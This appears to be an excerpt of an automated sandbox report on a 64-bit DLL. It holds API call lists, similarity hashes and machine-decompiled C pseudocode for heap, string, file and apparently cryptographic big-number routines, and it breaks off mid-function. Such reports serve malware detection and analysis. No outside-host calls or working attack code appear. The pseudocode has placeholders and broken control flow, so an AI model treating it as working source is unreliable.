                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
                  • String ID:
                  • API String ID: 3150570956-0
                  • Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
                  • Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
                  				void* _t13;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				CHAR* _t54;
                  				long long _t60;
                  				long long _t61;
                  				void* _t63;
                  				long _t69;
                  				long _t73;
                  				long long _t74;
                  				void* _t76;
                  				CHAR* _t79;
                  
                  				 *((long long*)(_t63 + 8)) = __rbx;
                  				 *((long long*)(_t63 + 0x10)) = _t60;
                  				 *((long long*)(_t63 + 0x18)) = __rsi;
                  				_t39 =  *0x8000d4a0;
                  				_t41 =  *((intOrPtr*)(_t39 + 8));
                  				_t13 = lstrlenA(_t79) + 1;
                  				r8d = _t13;
                  				HeapAlloc(_t76, _t73, _t69);
                  				_t74 = _t39;
                  				if (_t39 == __rsi) goto 0x80004eb7;
                  				HeapAlloc(??, ??, ??);
                  				_t61 = _t39;
                  				if (_t39 == __rsi) goto 0x80004ea9;
                  				E00000001180004994(_t39, _t41, __rcx);
                  				if (_t39 == __rsi) goto 0x80004e62;
                  				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
                  				_t6 = _t39 + 2; // 0x2
                  				E00000001180004994(_t39, _t41, _t6);
                  				if (_t39 == __rsi) goto 0x80004e8e;
                  				r8d = _t13 - r12d;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t41 + _t74)) = sil;
                  				lstrcpyA(_t54);
                  				goto 0x80004e9c;
                  				lstrcpyA(??, ??);
                  				 *_t61 = 0x2f;
                  				 *((intOrPtr*)(_t61 + 1)) = sil;
                  				 *__rdx = _t74;
                  				 *__r8 = _t61;
                  				goto 0x80004eb7;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}















                  0x180004dd0
                  0x180004dd5
                  0x180004dda
                  0x180004dec
                  0x180004df9
                  0x180004e0d
                  0x180004e0f
                  0x180004e14
                  0x180004e1a
                  0x180004e20
                  0x180004e2e
                  0x180004e34
                  0x180004e3a
                  0x180004e3f
                  0x180004e4a
                  0x180004e51
                  0x180004e53
                  0x180004e5a
                  0x180004e6b
                  0x180004e72
                  0x180004e77
                  0x180004e82
                  0x180004e86
                  0x180004e8c
                  0x180004e8e
                  0x180004e94
                  0x180004e98
                  0x180004e9c
                  0x180004ea4
                  0x180004ea7
                  0x180004eb1
                  0x180004ed5

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
                  • String ID:
                  • API String ID: 2951650171-0
                  • Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
                  • Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 29%
                  			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
                  				void* _v48;
                  				char _v56;
                  				char _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				long long _v88;
                  				void* __rdi;
                  				void* _t73;
                  				long long _t75;
                  				void* _t91;
                  				intOrPtr _t106;
                  				intOrPtr* _t115;
                  
                  				_t92 = __rsi;
                  				_a24 = __rbx;
                  				_a16 = __rdx;
                  				_t106 =  *((intOrPtr*)(__rcx + 0x40));
                  				_t75 = __rdx;
                  				r10d =  *(_t106 + 2) & 0x0000ffff;
                  				_t115 = __r8;
                  				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
                  				_t73 = __r10 + _t106 + 8;
                  				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
                  				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
                  				goto 0x80009a53;
                  				if (_t73 == 0) goto 0x80009b5c;
                  				_t9 =  &_a8; // 0x52
                  				_t10 =  &_v56; // 0x12
                  				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
                  				_t11 = _t73 + 2; // 0x2
                  				if (_a8 - _t11 <= 0) goto 0x80009aa8;
                  				_t15 =  &_v64; // 0xa
                  				_t16 =  &_v48; // 0x1a
                  				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
                  				goto 0x80009aad;
                  				if (0x57 != 0) goto 0x80009b36;
                  				r13d = _v64;
                  				_t19 =  &_v72; // 0x2
                  				_t20 =  &_v64; // 0xa
                  				_v80 = r13d;
                  				_v72 =  *_t115;
                  				_v88 = _v48;
                  				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
                  				memcpy(??, ??, ??);
                  				 *_t115 = _v72;
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b1b;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				r8d = _a8;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b61;
                  				return 2;
                  			}















                  0x1800099f4
                  0x1800099f4
                  0x1800099f9
                  0x180009a0b
                  0x180009a16
                  0x180009a19
                  0x180009a36
                  0x180009a3c
                  0x180009a3e
                  0x180009a45
                  0x180009a4a
                  0x180009a4f
                  0x180009a56
                  0x180009a5c
                  0x180009a64
                  0x180009a77
                  0x180009a7d
                  0x180009a87
                  0x180009a95
                  0x180009a9a
                  0x180009a9f
                  0x180009aa6
                  0x180009aaf
                  0x180009ab5
                  0x180009ac2
                  0x180009ac7
                  0x180009acf
                  0x180009ad4
                  0x180009ad8
                  0x180009ae6
                  0x180009afc
                  0x180009b0b
                  0x180009b0e
                  0x180009b14
                  0x180009b23
                  0x180009b30
                  0x180009b36
                  0x180009b45
                  0x180009b54
                  0x180009b5a
                  0x180009b78

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: FreeHeap$memset$memcpy
                  • String ID:
                  • API String ID: 4172471534-0
                  • Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
                  • Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
                  				void* _t44;
                  				void* _t52;
                  				long long _t53;
                  				signed long long _t54;
                  				intOrPtr _t67;
                  				long _t68;
                  				long long _t70;
                  				void* _t77;
                  				intOrPtr* _t83;
                  				long _t87;
                  				void* _t88;
                  				void* _t90;
                  				struct _CRITICAL_SECTION* _t92;
                  				struct _CRITICAL_SECTION* _t96;
                  
                  				_t52 = _t77;
                  				 *((long long*)(_t52 + 8)) = __rbx;
                  				 *((long long*)(_t52 + 0x10)) = __rbp;
                  				 *((long long*)(_t52 + 0x20)) = __rsi;
                  				 *((long long*)(_t52 + 0x18)) = __r8;
                  				_t53 =  *0x8000d4a0;
                  				_t88 = __rcx;
                  				EnterCriticalSection(_t96);
                  				LeaveCriticalSection(_t92);
                  				HeapAlloc(_t90, _t87, _t68);
                  				_t70 = _t53;
                  				if (_t53 == __edx) goto 0x80008129;
                  				memset(??, ??, ??);
                  				EnterCriticalSection(??);
                  				r11d =  *((intOrPtr*)(__rcx + 0xa8));
                  				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
                  				if (_t44 == 0) goto 0x80008111;
                  				_t54 = __edx + __edx * 4;
                  				_t14 = _t88 + 0x98; // 0x98
                  				_t16 = _t54 * 8; // 0xc
                  				_t83 = _t70 + _t16 + 0xc;
                  				_t67 =  *_t14;
                  				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
                  				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
                  				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
                  				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
                  				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
                  				LeaveCriticalSection(??);
                  				 *__r9 = __ebp + 1;
                  				 *_a24 = _t70;
                  				goto 0x8000812e;
                  				return 8;
                  			}

















                  0x180008034
                  0x180008037
                  0x18000803b
                  0x18000803f
                  0x180008043
                  0x180008054
                  0x18000805e
                  0x18000806f
                  0x180008082
                  0x18000809a
                  0x1800080a2
                  0x1800080a8
                  0x1800080b2
                  0x1800080bc
                  0x1800080c2
                  0x1800080cd
                  0x1800080d3
                  0x1800080d5
                  0x1800080da
                  0x1800080e2
                  0x1800080e2
                  0x1800080e7
                  0x1800080ef
                  0x1800080f7
                  0x1800080fe
                  0x18000810b
                  0x18000810f
                  0x180008116
                  0x180008121
                  0x180008124
                  0x180008127
                  0x18000814c

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocHeapmemset
                  • String ID:
                  • API String ID: 3215818008-0
                  • Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
                  • Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
                  • HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
                  • lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
                  • CloseHandle.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocCloseErrorFreeHandleLastlstrcpylstrlen
                  • String ID:
                  • API String ID: 2779700050-0
                  • Opcode ID: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
                  • Opcode Fuzzy Hash: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
                  				void* _v32;
                  				short _v38;
                  				short _v40;
                  				long long _v48;
                  				signed short _v54;
                  				signed short _v56;
                  				void* __rsi;
                  				void* _t20;
                  				void* _t24;
                  				short _t30;
                  				signed short _t32;
                  				long long _t44;
                  				long _t56;
                  				long _t59;
                  				void* _t60;
                  				long long _t63;
                  				void* _t65;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t45 = __rbx;
                  				_t75 = _t65;
                  				 *((long long*)(_t75 + 8)) = __rbx;
                  				 *((long long*)(_t75 + 0x10)) = __rbp;
                  				_t44 =  *0x8000d4a0;
                  				_t60 = __r8;
                  				_t63 = __rdx;
                  				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
                  				r12d = 0;
                  				if (_t20 != r12d) goto 0x8000376a;
                  				_t30 = _a32;
                  				_v38 = _t30;
                  				_v40 = _t30;
                  				_t32 = _t30 + 1 + _t30 + 1;
                  				_v54 = _t32;
                  				r8d = _t32 & 0x0000ffff;
                  				HeapAlloc(_t76, _t56, _t59);
                  				_v48 = _t44;
                  				if (_t44 == _t76) goto 0x8000375a;
                  				r8d = 0;
                  				_v56 = r12w;
                  				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
                  				RtlNtStatusToDosError(??);
                  				goto 0x80003748;
                  				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return _t24;
                  			}






















                  0x180003698
                  0x180003698
                  0x18000369b
                  0x18000369f
                  0x1800036ab
                  0x1800036b2
                  0x1800036b5
                  0x1800036c4
                  0x1800036c9
                  0x1800036d1
                  0x1800036d7
                  0x1800036dd
                  0x1800036e2
                  0x1800036ea
                  0x1800036ed
                  0x1800036f2
                  0x1800036f9
                  0x1800036ff
                  0x180003707
                  0x180003713
                  0x180003716
                  0x180003725
                  0x180003729
                  0x18000372f
                  0x180003743
                  0x180003754
                  0x180003764
                  0x18000377e

                  APIs
                    • Part of subcall function 0000000180001000: CreateFileW.KERNEL32 ref: 000000018000104A
                    • Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
                    • Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
                    • Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
                  • RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
                  • RtlNtStatusToDosError.NTDLL ref: 0000000180003729
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
                  • String ID:
                  • API String ID: 45859668-0
                  • Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
                  • Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
                  				void* __rdi;
                  				intOrPtr _t65;
                  				intOrPtr _t87;
                  				intOrPtr _t100;
                  				intOrPtr _t101;
                  				intOrPtr _t105;
                  				signed long long _t107;
                  				void* _t112;
                  				void* _t120;
                  				signed long long _t123;
                  				signed long long _t130;
                  				intOrPtr* _t131;
                  				intOrPtr _t139;
                  				void* _t154;
                  				intOrPtr _t155;
                  				void* _t157;
                  				signed long long _t159;
                  				intOrPtr* _t160;
                  				void* _t163;
                  				void* _t165;
                  				void* _t166;
                  				intOrPtr* _t171;
                  				void* _t179;
                  				signed long long _t181;
                  				signed long long _t182;
                  				int _t185;
                  				int _t187;
                  				void* _t191;
                  
                  				 *((long long*)(_t165 + 0x18)) = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rdx;
                  				 *((long long*)(_t165 + 8)) = __rcx;
                  				_t166 = _t165 - 0x660;
                  				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
                  				r13d = r9d;
                  				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				r9d = r9d - 1;
                  				_t123 = r9d - 1;
                  				if (__eflags < 0) goto 0x80003400;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
                  				_t105 = __r9 + 1;
                  				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
                  				if (_t105 == 0) goto 0x80003641;
                  				_t13 = _t123 + 0x20; // 0x20
                  				r14d = _t13;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
                  				_t112 = 0 - r14d;
                  				if (_t112 >= 0) goto 0x8000342d;
                  				if (_t112 != 0) goto 0x80003422;
                  				r14d = r14d - 1;
                  				r8d = _t105;
                  				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
                  				memset(_t191, _t187, _t185);
                  				_t16 = _t166 + 0x250; // 0x249
                  				r9d = r13d;
                  				r8d = r14d;
                  				_t130 = _t185 << 2;
                  				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
                  				_t17 = _t166 + 0x40; // 0x39
                  				r9d = _t105;
                  				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
                  				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
                  				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
                  				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
                  				memset(_t163, ??);
                  				r13d = r13d - _t105;
                  				_t139 = _t105;
                  				_t181 = r13d;
                  				 *(_t166 + 0x30) = _t181;
                  				if (_t112 < 0) goto 0x800035ee;
                  				_t124 = _t181 + _t139;
                  				_t28 = _t181 * 4; // 0x249
                  				_t160 = _t166 + _t28 + 0x250;
                  				r9d = 0xffffffff;
                  				_t31 = _t124 * 4; // 0x249
                  				_t131 = _t166 + _t31 + 0x250;
                  				if (_t100 != r9d) goto 0x800034d0;
                  				_t101 =  *_t131;
                  				goto 0x800034fb;
                  				r8d = _t155 + 1;
                  				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
                  				_t44 = _t166 + 0x40; // 0x39
                  				_t171 = _t160;
                  				r10d = _t105;
                  				if (_t101 == 0) goto 0x8000357a;
                  				r12d = 0xffffffff;
                  				r9d =  *_t44;
                  				_t87 =  *_t160;
                  				r10d = r10d + r12d;
                  				_t176 = __r9 * _t163;
                  				 *_t171 = _t87;
                  				if (_t87 - r12d <= 0) goto 0x80003548;
                  				goto 0x8000354a;
                  				 *_t171 =  *_t171 - r9d;
                  				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
                  				goto 0x80003567;
                  				if (r10d != 0) goto 0x80003517;
                  				_t107 =  *((intOrPtr*)(_t166 + 0x28));
                  				_t182 =  *(_t166 + 0x30);
                  				 *_t131 =  *_t131 - 0 + 0 + r11d;
                  				if ( *_t131 != 0) goto 0x80003595;
                  				_t47 = _t166 + 0x40; // 0x39
                  				r8d = _t107;
                  				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
                  				if (_t120 < 0) goto 0x800035ae;
                  				_t48 = _t166 + 0x40; // 0x39
                  				r9d = _t107;
                  				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
                  				goto 0x8000357c;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
                  				r13d = r13d - 1;
                  				 *(_t166 + 0x30) = _t182 - 1;
                  				r9d = 0xffffffff;
                  				if (_t120 >= 0) goto 0x800034c7;
                  				r14d =  *((intOrPtr*)(_t166 + 0x20));
                  				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				memset(??, ??, ??);
                  				_t57 = _t166 + 0x250; // 0x249
                  				r9d = _t107;
                  				r8d = r14d;
                  				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
                  				r8d = 0x40c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}































                  0x1800033b4
                  0x1800033b9
                  0x1800033be
                  0x1800033ce
                  0x1800033d5
                  0x1800033dd
                  0x1800033e0
                  0x1800033f1
                  0x1800033f4
                  0x1800033f8
                  0x1800033fe
                  0x180003400
                  0x180003404
                  0x18000340a
                  0x18000341a
                  0x18000341a
                  0x180003420
                  0x180003422
                  0x180003425
                  0x18000342b
                  0x18000342d
                  0x180003430
                  0x180003441
                  0x180003446
                  0x18000344b
                  0x180003456
                  0x180003459
                  0x18000345f
                  0x180003463
                  0x180003468
                  0x18000346d
                  0x180003473
                  0x18000347a
                  0x18000347f
                  0x180003490
                  0x180003494
                  0x180003499
                  0x18000349c
                  0x18000349f
                  0x1800034a2
                  0x1800034a7
                  0x1800034ad
                  0x1800034b1
                  0x1800034b1
                  0x1800034b9
                  0x1800034bf
                  0x1800034bf
                  0x1800034ca
                  0x1800034cc
                  0x1800034ce
                  0x1800034d3
                  0x1800034f7
                  0x1800034fd
                  0x180003505
                  0x180003508
                  0x18000350d
                  0x180003511
                  0x18000351a
                  0x180003520
                  0x180003524
                  0x180003527
                  0x18000353a
                  0x18000353f
                  0x180003546
                  0x18000354a
                  0x18000355c
                  0x180003563
                  0x18000356f
                  0x180003571
                  0x180003575
                  0x18000357a
                  0x18000357f
                  0x180003581
                  0x180003586
                  0x180003591
                  0x180003593
                  0x180003595
                  0x18000359a
                  0x1800035aa
                  0x1800035ac
                  0x1800035be
                  0x1800035c9
                  0x1800035cd
                  0x1800035d5
                  0x1800035db
                  0x1800035e1
                  0x1800035ee
                  0x1800035ff
                  0x180003604
                  0x18000360c
                  0x18000360f
                  0x180003615
                  0x180003624
                  0x18000362a
                  0x180003636
                  0x18000365b

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
                  • Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memcmp$FreeHeap
                  • String ID:
                  • API String ID: 1680564963-0
                  • Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
                  • Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
                  				void* __rsi;
                  				signed int _t65;
                  				unsigned int _t66;
                  				signed int _t73;
                  				void* _t78;
                  				unsigned int _t85;
                  				void* _t87;
                  				void* _t91;
                  				void* _t112;
                  				int _t116;
                  				long long _t122;
                  				void* _t125;
                  				void* _t126;
                  				int _t143;
                  				void* _t145;
                  				void* _t148;
                  
                  				_t78 = __eflags;
                  				_t87 = _t125;
                  				 *((long long*)(_t87 + 0x10)) = __rbx;
                  				 *((long long*)(_t87 + 0x18)) = _t122;
                  				 *((long long*)(_t87 + 8)) = __rcx;
                  				_t126 = _t125 - 0x860;
                  				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
                  				_t91 = __rdx;
                  				 *(_t126 + 0x30) = _t148 << 2;
                  				memcpy(_t148, _t145, _t143);
                  				_t9 = _t126 + 0x454; // 0x4a5
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t13 = _t126 + 0x658; // 0x6a9
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
